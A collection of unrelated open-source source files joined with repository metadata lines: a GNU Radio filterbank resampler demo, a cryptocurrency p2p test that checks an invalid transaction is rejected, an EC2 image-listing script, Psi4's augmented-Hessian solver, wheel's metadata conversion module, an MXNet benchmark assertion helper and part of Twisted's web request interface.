def __init__(self):
gr.top_block.__init__(self)
self._N = 100000 # number of samples to use
self._fs = 2000 # initial sampling rate
self._interp = 5 # Interpolation rate for PFB interpolator
self._ainterp = 5.5 # Resampling rate for the PFB arbitrary resampler
# Frequencies of the signals we construct
freq1 = 100
freq2 = 200
# Create a set of taps for the PFB interpolator
# This is based on the post-interpolation sample rate
self._taps = gr.firdes.low_pass_2(self._interp, self._interp*self._fs, freq2+50, 50,
attenuation_dB=120, window=gr.firdes.WIN_BLACKMAN_hARRIS)
# Create a set of taps for the PFB arbitrary resampler
# The filter size is the number of filters in the filterbank; 32 will give very low side-lobes,
# and larger numbers will reduce these even further
# The taps in this filter are based on a sampling rate of the filter size since it acts
# internally as an interpolator.
flt_size = 32
self._taps2 = gr.firdes.low_pass_2(flt_size, flt_size*self._fs, freq2+50, 150,
attenuation_dB=120, window=gr.firdes.WIN_BLACKMAN_hARRIS)
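# For reference (added comment): with the settings above, the PFB
# interpolator output runs at self._interp * self._fs = 5 * 2000 = 10000
# samples/s, while the arbitrary resampler produces self._ainterp *
# self._fs = 5.5 * 2000 = 11000 samples/s; these are the rates later used
# as fs_int and fs_aint when plotting.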
# Calculate the number of taps per channel for our own information
tpc = scipy.ceil(float(len(self._taps)) / float(self._interp))
print "Number of taps: ", len(self._taps)
print "Number of filters: ", self._interp
print "Taps per channel: ", tpc
# Create a couple of signals at different frequencies
self.signal1 = gr.sig_source_c(self._fs, gr.GR_SIN_WAVE, freq1, 0.5)
self.signal2 = gr.sig_source_c(self._fs, gr.GR_SIN_WAVE, freq2, 0.5)
self.signal = gr.add_cc()
self.head = gr.head(gr.sizeof_gr_complex, self._N)
# Construct the PFB interpolator filter
self.pfb = blks2.pfb_interpolator_ccf(self._interp, self._taps)
# Construct the PFB arbitrary resampler filter
self.pfb_ar = blks2.pfb_arb_resampler_ccf(self._ainterp, self._taps2, flt_size)
self.snk_i = gr.vector_sink_c()
#self.pfb_ar.pfb.print_taps()
#self.pfb.pfb.print_taps()
# Connect the blocks
self.connect(self.signal1, self.head, (self.signal,0))
self.connect(self.signal2, (self.signal,1))
self.connect(self.signal, self.pfb)
self.connect(self.signal, self.pfb_ar)
self.connect(self.signal, self.snk_i)
# Create the sink for the interpolated signals
self.snk1 = gr.vector_sink_c()
self.snk2 = gr.vector_sink_c()
self.connect(self.pfb, self.snk1)
self.connect(self.pfb_ar, self.snk2)
def main():
tb = pfb_top_block()
tstart = time.time()
tb.run()
tend = time.time()
print "Run time: %f" % (tend - tstart)
if 1:
fig1 = pylab.figure(1, figsize=(12,10), facecolor="w")
fig2 = pylab.figure(2, figsize=(12,10), facecolor="w")
fig3 = pylab.figure(3, figsize=(12,10), facecolor="w")
Ns = 10000
Ne = 10000
fftlen = 8192
winfunc = scipy.blackman
# Plot input signal
fs = tb._fs
d = tb.snk_i.data()[Ns:Ns+Ne]
sp1_f = fig1.add_subplot(2, 1, 1)
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_in = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_in = scipy.arange(-fs/2.0, fs/2.0, fs/float(X_in.size))
p1_f = sp1_f.plot(f_in, X_in, "b")
sp1_f.set_xlim([min(f_in), max(f_in)+1])
sp1_f.set_ylim([-200.0, 50.0])
sp1_f.set_title("Input Signal", weight="bold")
sp1_f.set_xlabel("Frequency (Hz)")
sp1_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs
Tmax = len(d)*Ts
t_in = scipy.arange(0, Tmax, Ts)
x_in = scipy.array(d)
sp1_t = fig1.add_subplot(2, 1, 2)
p1_t = sp1_t.plot(t_in, x_in.real, "b-o")
#p1_t = sp1_t.plot(t_in, x_in.imag, "r-o")
sp1_t.set_ylim([-2.5, 2.5])
sp1_t.set_title("Input Signal", weight="bold")
sp1_t.set_xlabel("Time (s)")
sp1_t.set_ylabel("Amplitude")
# Plot output of PFB interpolator
fs_int = tb._fs*tb._interp
sp2_f = fig2.add_subplot(2, 1, 1)
d = tb.snk1.data()[Ns:Ns+(tb._interp*Ne)]
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_o = scipy.arange(-fs_int/2.0, fs_int/2.0, fs_int/float(X_o.size))
p2_f = sp2_f.plot(f_o, X_o, "b")
sp2_f.set_xlim([min(f_o), max(f_o)+1])
sp2_f.set_ylim([-200.0, 50.0])
sp2_f.set_title("Output Signal from PFB Interpolator", weight="bold")
sp2_f.set_xlabel("Frequency (Hz)")
sp2_f.set_ylabel("Power (dBW)")
Ts_int = 1.0/fs_int
Tmax = len(d)*Ts_int
t_o = scipy.arange(0, Tmax, Ts_int)
x_o1 = scipy.array(d)
sp2_t = fig2.add_subplot(2, 1, 2)
p2_t = sp2_t.plot(t_o, x_o1.real, "b-o")
#p2_t = sp2_t.plot(t_o, x_o.imag, "r-o")
sp2_t.set_ylim([-2.5, 2.5])
sp2_t.set_title("Output Signal from PFB Interpolator", weight="bold")
sp2_t.set_xlabel("Time (s)")
sp2_t.set_ylabel("Amplitude")
# Plot output of PFB arbitrary resampler
fs_aint = tb._fs * tb._ainterp
sp3_f = fig3.add_subplot(2, 1, 1)
d = tb.snk2.data()[Ns:Ns+(tb._interp*Ne)]
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_o = scipy.arange(-fs_aint/2.0, fs_aint/2.0, fs_aint/float(X_o.size))
p3_f = sp3_f.plot(f_o, X_o, "b")
sp3_f.set_xlim([min(f_o), max(f_o)+1])
sp3_f.set_ylim([-200.0, 50.0])
sp3_f.set_title("Output Signal from PFB Arbitrary Resampler", weight="bold")
sp3_f.set_xlabel("Frequency (Hz)")
sp3_f.set_ylabel("Power (dBW)")
Ts_aint = 1.0/fs_aint
Tmax = len(d)*Ts_aint
t_o = scipy.arange(0, Tmax, Ts_aint)
x_o2 = scipy.array(d)
sp3_f = fig3.add_subplot(2, 1, 2)
p3_f = sp3_f.plot(t_o, x_o2.real, "b-o")
p3_f = sp3_f.plot(t_o, x_o1.real, "m-o")
#p3_f = sp3_f.plot(t_o, x_o2.imag, "r-o")
sp3_f.set_ylim([-2.5, 2.5])
sp3_f.set_title("Output Signal from PFB Arbitrary Resampler", weight="bold")
sp3_f.set_xlabel("Time (s)")
sp3_f.set_ylabel("Amplitude")
pylab.show()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| gpl-3.0 |
MeshCollider/Omnicoin | qa/rpc-tests/invalidtxrequest.py | 8 | 2606 | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.mininode import *
from test_framework.blocktools import *
import logging
import copy
import time
'''
In this test we connect to one node over p2p, and test tx requests.
'''
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidTxRequestTest(ComparisonTestFramework):
''' This test can either be run with one node checking expected answers, or with two nodes comparing outputs.
Change the "outcome" variable in each TestInstance object to only do the comparison. '''
def __init__(self):
self.num_nodes = 1
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
self.tip = None
self.block_time = None
NetworkThread().start() # Start up network handling in another thread
test.run()
def get_tests(self):
if self.tip is None:
self.tip = int ("0x" + self.nodes[0].getbestblockhash() + "L", 0)
self.block_time = int(time.time())+1
'''
Create a new block with an anyone-can-spend coinbase
'''
height = 1
block = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
yield TestInstance([[block, True]])
'''
Now we need that block to mature so we can spend the coinbase.
'''
test = TestInstance(sync_every_block=False)
for i in xrange(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.tip = block.sha256
self.block_time += 1
test.blocks_and_transactions.append([block, True])
height += 1
yield test
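# (Added note: the 100-block wait reflects the coinbase maturity consensus
# rule; coinbase outputs only become spendable 100 blocks after they are
# mined, so tx1 below may legitimately spend block1's coinbase.)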
# chr(100) is OP_NOTIF
# Transaction will be rejected with code 16 (REJECT_INVALID)
tx1 = create_transaction(self.block1.vtx[0], 0, chr(100), 50*100000000)
yield TestInstance([[tx1, RejectResult(16, 'mandatory-script-verify-flag-failed')]])
# TODO: test further transactions...
if __name__ == '__main__':
InvalidTxRequestTest().main()
| mit |
AICIDNN/cloudbiolinux | utils/images_and_snapshots.py | 10 | 1387 | import boto
import collections
OWNER = '678711657553' # Brad's owner ID
def images_and_snapshots(owner):
"""Retrieve Biolinux image and snapshot information.
"""
conn = boto.connect_ec2()
images = conn.get_all_images(owners=[owner])
images32 = _sorted_images(images, "CloudBioLinux 32")
images64 = _sorted_images(images, "CloudBioLinux 64")
datalibs = _data_libraries(conn, owner)
print images32
print images64
print datalibs
def _data_libraries(conn, owner):
library_types = collections.defaultdict(list)
snaps = conn.get_all_snapshots(owner=owner)
for snap in snaps:
if snap.description.startswith("CloudBioLinux Data"):
# the type is everything except the start and date
data_type = " ".join(snap.description.split()[2:-1])
library_types[data_type].append(snap)
final = dict()
for name, snaps in library_types.iteritems():
snaps = [(s.description, s) for s in snaps]
snaps.sort(reverse=True)
final[name] = [(s.id, d) for (d, s) in snaps]
return final
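# Worked example (added for illustration): a snapshot described as
# "CloudBioLinux Data GalaxyIndices 2012-08-01" yields the data_type
# "GalaxyIndices" (everything between the fixed prefix and the trailing
# date); within each library, snapshots sort newest-first because the
# descriptions end in an ISO date and are sorted in reverse.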
def _sorted_images(images, start_name):
"""Retrieve a sorted list of images with most recent first.
"""
images = [(i.name, i) for i in images if i.name.startswith(start_name)]
images.sort(reverse=True)
return [(i.id, name) for (name, i) in images]
images_and_snapshots(OWNER)
| mit |
psi4/psi4 | psi4/driver/procrouting/mcscf/augmented_hessian.py | 7 | 5802 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import os
import numpy as np
from psi4 import core
from psi4.driver import p4util
from psi4.driver.p4util.exceptions import *
def ah_iteration(mcscf_obj, tol=1e-3, max_iter=15, lindep=1e-14, print_micro=True):
"""
Solve the generalized eigenvalue problem:
| 0   g.T | | 1/l |     | 1/l |
| g   H/l | |  X  | = e |  X  |
Where g is the gradient, H is the orbital Hessian, X is our orbital update step,
and l is the eigenvalue.
In some ways this is the subspace reduction of the full MCSCF Hessian where the
CC part has been solved exactly. When this occurs the OC and CO elements collapse
to the above and the CC Hessian becomes diagonally dominant.
We can solve this through Davidson iterations where we condition the edges. It's the
Pulay equations all over again, just iterative.
Watch out for lambdas that are zero; we are looking for the lambda that is ~1.
"""
# Unpack information
orb_grad = mcscf_obj.gradient()
precon = mcscf_obj.H_approx_diag()
approx_step = mcscf_obj.approx_solve()
orb_grad_ssq = orb_grad.sum_of_squares()
# Gears
min_lambda = 0.3
converged = False
warning_neg = False
warning_mult = False
fullG = np.zeros((max_iter + 2, max_iter + 2))
fullS = np.zeros((max_iter + 2, max_iter + 2))
fullS[np.diag_indices_from(fullS)] = 1
guesses = []
sigma_list = []
guesses.append(approx_step)
sigma_list.append(mcscf_obj.compute_Hk(approx_step))
if print_micro:
core.print_out("\n Eigenvalue Rel dE dX \n")
# Run Davidson look for lambda ~ 1
old_val = 0
for microi in range(1, max_iter + 1):
# Gradient
fullG[0, microi] = guesses[-1].vector_dot(orb_grad)
for i in range(microi):
fullG[i + 1, microi] = guesses[-1].vector_dot(sigma_list[i])
fullS[i + 1, microi] = guesses[-1].vector_dot(guesses[i])
fullG[microi] = fullG[:, microi]
fullS[microi] = fullS[:, microi]
wlast = old_val
# Slice out relevant S and G
S = fullS[:microi + 1, :microi + 1]
G = fullG[:microi + 1, :microi + 1]
# Solve Gv = lSv
v, L = np.linalg.eigh(S)
mask = v > (np.min(np.abs(v)) * 1.e-10)
invL = L[:, mask] * (v[mask]**-0.5)
# Solve in S basis, rotate back
evals, evecs = np.linalg.eigh(np.dot(invL.T, G).dot(invL))
vectors = np.dot(invL, evecs)
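# (Added note: this is canonical orthogonalization. With S = L diag(v) L.T
# and invL = L[:, mask] * v[mask]**-0.5 we get invL.T S invL = I, so the
# generalized problem G x = e S x reduces to the ordinary symmetric
# eigenproblem (invL.T G invL) y = e y with x = invL y; near-null modes of
# S are masked out for numerical stability.)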
# Figure out the right root to follow
if np.sum(np.abs(vectors[0]) > min_lambda) == 0:
raise PsiException("Augmented Hessian: Could not find the correct root!\n"\
"Try starting AH when the MCSCF wavefunction is more converged.")
if np.sum(np.abs(vectors[0]) > min_lambda) > 1 and not warning_mult:
core.print_out(r" Warning! Multiple eigenvectors found to follow. Following closest to \lambda = 1.\n")
warning_mult = True
idx = (np.abs(1 - np.abs(vectors[0]))).argmin()
lam = abs(vectors[0, idx])
subspace_vec = vectors[1:, idx]
# Negative roots should go away?
if idx > 0 and evals[idx] < -5.0e-6 and not warning_neg:
core.print_out(' Warning! AH might follow negative eigenvalues!\n')
warning_neg = True
diff_val = evals[idx] - old_val
old_val = evals[idx]
new_guess = guesses[0].clone()
new_guess.zero()
for num, c in enumerate(subspace_vec / lam):
new_guess.axpy(c, guesses[num])
# Build estimated sigma vector
new_dx = sigma_list[0].clone()
new_dx.zero()
for num, c in enumerate(subspace_vec):
new_dx.axpy(c, sigma_list[num])
# Consider restraints
new_dx.axpy(lam, orb_grad)
new_dx.axpy(old_val * lam, new_guess)
norm_dx = (new_dx.sum_of_squares() / orb_grad_ssq)**0.5
if print_micro:
core.print_out(" AH microiter %2d % 18.12e % 6.4e % 6.4e\n" % (microi, evals[idx],
diff_val / evals[idx], norm_dx))
if abs(old_val - wlast) < tol and norm_dx < (tol**0.5):
converged = True
break
# Apply preconditioner
tmp = precon.clone()
val = tmp.clone()
val.set(evals[idx])
tmp.subtract(val)
new_dx.apply_denominator(tmp)
guesses.append(new_dx)
sigma_list.append(mcscf_obj.compute_Hk(new_dx))
if print_micro and converged:
core.print_out("\n")
# core.print_out(" AH converged! \n\n")
#if not converged:
# core.print_out(" !Warning. Augmented Hessian did not converge.\n")
new_guess.scale(-1.0)
return converged, microi, new_guess
| lgpl-3.0 |
raajitr/django_hangman | env/lib/python2.7/site-packages/wheel/metadata.py | 230 | 11050 | """
Tools for converting old- to new-style metadata.
"""
from collections import namedtuple
from .pkginfo import read_pkg_info
from .util import OrderedDefaultDict
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
import re
import os.path
import textwrap
import pkg_resources
import email.parser
import wheel
METADATA_VERSION = "2.0"
PLURAL_FIELDS = { "classifier" : "classifiers",
"provides_dist" : "provides",
"provides_extra" : "extras" }
SKIP_FIELDS = set()
CONTACT_FIELDS = (({"email":"author_email", "name": "author"},
"author"),
({"email":"maintainer_email", "name": "maintainer"},
"maintainer"))
# commonly filled out as "UNKNOWN" by distutils:
UNKNOWN_FIELDS = set(("author", "author_email", "platform", "home_page",
"license"))
# Wheel itself is probably the only program that uses non-extras markers
# in METADATA/PKG-INFO. Support its syntax with the extra at the end only.
EXTRA_RE = re.compile("""^(?P<package>.*?)(;\s*(?P<condition>.*?)(extra == '(?P<extra>.*?)')?)$""")
KEYWORDS_RE = re.compile("[\0-,]+")
MayRequiresKey = namedtuple('MayRequiresKey', ('condition', 'extra'))
def unique(iterable):
"""
Yield unique values in iterable, preserving order.
"""
seen = set()
for value in iterable:
if not value in seen:
seen.add(value)
yield value
def handle_requires(metadata, pkg_info, key):
"""
Place the runtime requirements from pkg_info into metadata.
"""
may_requires = OrderedDefaultDict(list)
for value in sorted(pkg_info.get_all(key)):
extra_match = EXTRA_RE.search(value)
if extra_match:
groupdict = extra_match.groupdict()
condition = groupdict['condition']
extra = groupdict['extra']
package = groupdict['package']
if condition.endswith(' and '):
condition = condition[:-5]
else:
condition, extra = None, None
package = value
key = MayRequiresKey(condition, extra)
may_requires[key].append(package)
if may_requires:
metadata['run_requires'] = []
def sort_key(item):
# Both condition and extra could be None, which can't be compared
# against strings in Python 3.
key, value = item
if key.condition is None:
return ''
return key.condition
for key, value in sorted(may_requires.items(), key=sort_key):
may_requirement = OrderedDict((('requires', value),))
if key.extra:
may_requirement['extra'] = key.extra
if key.condition:
may_requirement['environment'] = key.condition
metadata['run_requires'].append(may_requirement)
if not 'extras' in metadata:
metadata['extras'] = []
metadata['extras'].extend([key.extra for key in may_requires.keys() if key.extra])
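# Worked example (added for illustration): a PKG-INFO line such as
#   Requires-Dist: mock; python_version < '3.3' and extra == 'test'
# matches EXTRA_RE with package='mock', extra='test' and, after the
# trailing ' and ' is stripped, condition="python_version < '3.3'"; it ends
# up in metadata['run_requires'] as
#   {'requires': ['mock'], 'extra': 'test',
#    'environment': "python_version < '3.3'"}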
def pkginfo_to_dict(path, distribution=None):
"""
Convert PKG-INFO to a prototype Metadata 2.0 (PEP 426) dict.
The description is included under the key ['description'] rather than
being written to a separate file.
path: path to PKG-INFO file
distribution: optional distutils Distribution()
"""
metadata = OrderedDefaultDict(lambda: OrderedDefaultDict(lambda: OrderedDefaultDict(OrderedDict)))
metadata["generator"] = "bdist_wheel (" + wheel.__version__ + ")"
try:
unicode
pkg_info = read_pkg_info(path)
except NameError:
pkg_info = email.parser.Parser().parsestr(open(path, 'rb').read().decode('utf-8'))
description = None
if pkg_info['Summary']:
metadata['summary'] = pkginfo_unicode(pkg_info, 'Summary')
del pkg_info['Summary']
if pkg_info['Description']:
description = dedent_description(pkg_info)
del pkg_info['Description']
else:
payload = pkg_info.get_payload()
if isinstance(payload, bytes):
# Avoid a Python 2 Unicode error.
# We still suffer ? glyphs on Python 3.
payload = payload.decode('utf-8')
if payload:
description = payload
if description:
pkg_info['description'] = description
for key in sorted(unique(k.lower() for k in pkg_info.keys())):
low_key = key.replace('-', '_')
if low_key in SKIP_FIELDS:
continue
if low_key in UNKNOWN_FIELDS and pkg_info.get(key) == 'UNKNOWN':
continue
if low_key in sorted(PLURAL_FIELDS):
metadata[PLURAL_FIELDS[low_key]] = pkg_info.get_all(key)
elif low_key == "requires_dist":
handle_requires(metadata, pkg_info, key)
elif low_key == 'provides_extra':
if not 'extras' in metadata:
metadata['extras'] = []
metadata['extras'].extend(pkg_info.get_all(key))
elif low_key == 'home_page':
metadata['extensions']['python.details']['project_urls'] = {'Home':pkg_info[key]}
elif low_key == 'keywords':
metadata['keywords'] = KEYWORDS_RE.split(pkg_info[key])
else:
metadata[low_key] = pkg_info[key]
metadata['metadata_version'] = METADATA_VERSION
if 'extras' in metadata:
metadata['extras'] = sorted(set(metadata['extras']))
# include more information if distribution is available
if distribution:
for requires, attr in (('test_requires', 'tests_require'),):
try:
requirements = getattr(distribution, attr)
if isinstance(requirements, list):
new_requirements = sorted(convert_requirements(requirements))
metadata[requires] = [{'requires':new_requirements}]
except AttributeError:
pass
# handle contacts
contacts = []
for contact_type, role in CONTACT_FIELDS:
contact = OrderedDict()
for key in sorted(contact_type):
if contact_type[key] in metadata:
contact[key] = metadata.pop(contact_type[key])
if contact:
contact['role'] = role
contacts.append(contact)
if contacts:
metadata['extensions']['python.details']['contacts'] = contacts
# convert entry points to exports
try:
with open(os.path.join(os.path.dirname(path), "entry_points.txt"), "r") as ep_file:
ep_map = pkg_resources.EntryPoint.parse_map(ep_file.read())
exports = OrderedDict()
for group, items in sorted(ep_map.items()):
exports[group] = OrderedDict()
for item in sorted(map(str, items.values())):
name, export = item.split(' = ', 1)
exports[group][name] = export
if exports:
metadata['extensions']['python.exports'] = exports
except IOError:
pass
# copy console_scripts entry points to commands
if 'python.exports' in metadata['extensions']:
for (ep_script, wrap_script) in (('console_scripts', 'wrap_console'),
('gui_scripts', 'wrap_gui')):
if ep_script in metadata['extensions']['python.exports']:
metadata['extensions']['python.commands'][wrap_script] = \
metadata['extensions']['python.exports'][ep_script]
return metadata
def requires_to_requires_dist(requirement):
"""Compose the version predicates for requirement in PEP 345 fashion."""
requires_dist = []
for op, ver in requirement.specs:
requires_dist.append(op + ver)
if not requires_dist:
return ''
return " (%s)" % ','.join(requires_dist)
def convert_requirements(requirements):
"""Yield Requires-Dist: strings for parsed requirements strings."""
for req in requirements:
parsed_requirement = pkg_resources.Requirement.parse(req)
spec = requires_to_requires_dist(parsed_requirement)
extras = ",".join(parsed_requirement.extras)
if extras:
extras = "[%s]" % extras
yield (parsed_requirement.project_name + extras + spec)
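# Worked example (added for illustration):
#   list(convert_requirements(['pytest>=3.0', 'requests[security]>=2.0,<3']))
# yields roughly
#   ['pytest (>=3.0)', 'requests[security] (>=2.0,<3)']
# (the exact order of the version predicates follows the parsed specs).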
def pkginfo_to_metadata(egg_info_path, pkginfo_path):
"""
Convert .egg-info directory with PKG-INFO to the Metadata 1.3 aka
old-draft Metadata 2.0 format.
"""
pkg_info = read_pkg_info(pkginfo_path)
pkg_info.replace_header('Metadata-Version', '2.0')
requires_path = os.path.join(egg_info_path, 'requires.txt')
if os.path.exists(requires_path):
requires = open(requires_path).read()
for extra, reqs in sorted(pkg_resources.split_sections(requires),
key=lambda x: x[0] or ''):
condition = ''
if extra and ':' in extra: # setuptools extra:condition syntax
extra, condition = extra.split(':', 1)
if extra:
pkg_info['Provides-Extra'] = extra
if condition:
condition += " and "
condition += 'extra == %s' % repr(extra)
if condition:
condition = '; ' + condition
for new_req in sorted(convert_requirements(reqs)):
pkg_info['Requires-Dist'] = new_req + condition
description = pkg_info['Description']
if description:
pkg_info.set_payload(dedent_description(pkg_info))
del pkg_info['Description']
return pkg_info
def pkginfo_unicode(pkg_info, field):
"""Hack to coax Unicode out of an email Message() - Python 3.3+"""
text = pkg_info[field]
field = field.lower()
if not isinstance(text, str):
if not hasattr(pkg_info, 'raw_items'): # Python 3.2
return str(text)
for item in pkg_info.raw_items():
if item[0].lower() == field:
text = item[1].encode('ascii', 'surrogateescape')\
.decode('utf-8')
break
return text
def dedent_description(pkg_info):
"""
Dedent and convert pkg_info['Description'] to Unicode.
"""
description = pkg_info['Description']
# Python 3 Unicode handling, sorta.
surrogates = False
if not isinstance(description, str):
surrogates = True
description = pkginfo_unicode(pkg_info, 'Description')
description_lines = description.splitlines()
description_dedent = '\n'.join(
# if the first line of long_description is blank,
# the first line here will be indented.
(description_lines[0].lstrip(),
textwrap.dedent('\n'.join(description_lines[1:])),
'\n'))
if surrogates:
description_dedent = description_dedent\
.encode("utf8")\
.decode("ascii", "surrogateescape")
return description_dedent
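# Hedged example of the dedent behaviour above (assumed input): a payload of
#     'First line\n        indented body'
# comes back as 'First line\nindented body\n\n' -- only the first line is
# lstripped, because long_description strings usually start unindented.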
if __name__ == "__main__":
import sys, pprint
pprint.pprint(pkginfo_to_dict(sys.argv[1]))
| mit |
ykim362/mxnet | tests/nightly/mxnet_keras_integration_tests/assertion_util.py | 43 | 4800 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.tools import assert_true
def assert_results(MACHINE_TYPE, IS_GPU, GPU_NUM, profile_output, CPU_BENCHMARK_RESULTS, GPU_1_BENCHMARK_RESULTS, GPU_2_BENCHMARK_RESULTS, GPU_4_BENCHMARK_RESULTS, GPU_8_BENCHMARK_RESULTS):
"""
Helps in asserting benchmarking results.
    Compares the actual output in profile_output with the expected results in
    GPU_1_BENCHMARK_RESULTS, GPU_2_BENCHMARK_RESULTS, GPU_4_BENCHMARK_RESULTS
    or GPU_8_BENCHMARK_RESULTS (depending on GPU_NUM) if IS_GPU is True.
    Otherwise, compares with CPU_BENCHMARK_RESULTS.
Uses keys - MODEL, TRAINING_TIME, MEM_CONSUMPTION, TRAIN_ACCURACY and TEST_ACCURACY
to fetch data from provided actual and expected results input map stated above.
"""
# Model type
model = profile_output['MODEL']
# Actual values.
actual_training_time = profile_output['TRAINING_TIME']
actual_memory_consumption = profile_output['MEM_CONSUMPTION']
actual_train_accuracy = profile_output['TRAIN_ACCURACY']
actual_test_accuracy = profile_output['TEST_ACCURACY']
# Expected values
expected_training_time = 0.0
expected_memory_consumption = 0.0
expected_train_accuracy = 1.0
expected_test_accuracy = 1.0
# Set right set of expected values based on current run type
if(IS_GPU):
if GPU_NUM == 1:
expected_training_time = GPU_1_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_1_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_1_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_1_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 2:
expected_training_time = GPU_2_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_2_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_2_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_2_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 4:
expected_training_time = GPU_4_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_4_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_4_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_4_BENCHMARK_RESULTS['TEST_ACCURACY']
elif GPU_NUM == 8:
expected_training_time = GPU_8_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = GPU_8_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = GPU_8_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = GPU_8_BENCHMARK_RESULTS['TEST_ACCURACY']
else:
expected_training_time = CPU_BENCHMARK_RESULTS['TRAINING_TIME']
expected_memory_consumption = CPU_BENCHMARK_RESULTS['MEM_CONSUMPTION']
expected_train_accuracy = CPU_BENCHMARK_RESULTS['TRAIN_ACCURACY']
expected_test_accuracy = CPU_BENCHMARK_RESULTS['TEST_ACCURACY']
# Validate Results
assert_true(actual_training_time < expected_training_time,'{0} on {1} machine with {2} GPU usage FAILED. Expected Training Time - {3} secs but was {4} secs.'.format(model, MACHINE_TYPE, GPU_NUM, expected_training_time, actual_training_time))
assert_true(actual_memory_consumption < expected_memory_consumption, '{0} on {1} machine with {2} GPU usage FAILED. Expected Mem Consumption - {3} MB but was {4} MB.'.format(model, MACHINE_TYPE, GPU_NUM, expected_memory_consumption, actual_memory_consumption))
assert_true(actual_train_accuracy > expected_train_accuracy, '{0} on {1} machine with {2} GPU usage FAILED. Expected Train Accuracy - {3} but was {4}.'.format(model, MACHINE_TYPE, GPU_NUM, expected_train_accuracy, actual_train_accuracy))
assert_true(actual_test_accuracy > expected_test_accuracy, '{0} on {1} machine with {2} GPU usage FAILED. Expected Test Accuracy - {3} but was {4}.'.format(model, MACHINE_TYPE, GPU_NUM, expected_test_accuracy, actual_test_accuracy))
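# Minimal usage sketch (hypothetical numbers, not from any benchmark run):
#
# profile = {'MODEL': 'resnet50', 'TRAINING_TIME': 120.0,
#            'MEM_CONSUMPTION': 900.0, 'TRAIN_ACCURACY': 0.92,
#            'TEST_ACCURACY': 0.90}
# cpu_expected = {'TRAINING_TIME': 150.0, 'MEM_CONSUMPTION': 1024.0,
#                 'TRAIN_ACCURACY': 0.90, 'TEST_ACCURACY': 0.88}
# assert_results('c4.8xlarge', False, 0, profile, cpu_expected, {}, {}, {}, {})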
| apache-2.0 |
lowitty/server | libsDarwin/twisted/web/iweb.py | 5 | 25674 | # -*- test-case-name: twisted.web.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Interface definitions for L{twisted.web}.
@var UNKNOWN_LENGTH: An opaque object which may be used as the value of
L{IBodyProducer.length} to indicate that the length of the entity
body is not known in advance.
"""
from zope.interface import Interface, Attribute
from twisted.internet.interfaces import IPushProducer
from twisted.cred.credentials import IUsernameDigestHash
class IRequest(Interface):
"""
An HTTP request.
@since: 9.0
"""
method = Attribute("A C{str} giving the HTTP method that was used.")
uri = Attribute(
"A C{str} giving the full encoded URI which was requested (including "
"query arguments).")
path = Attribute(
"A C{str} giving the encoded query path of the request URI.")
args = Attribute(
"A mapping of decoded query argument names as C{str} to "
"corresponding query argument values as C{list}s of C{str}. "
"For example, for a URI with C{'foo=bar&foo=baz&quux=spam'} "
"for its query part, C{args} will be C{{'foo': ['bar', 'baz'], "
"'quux': ['spam']}}.")
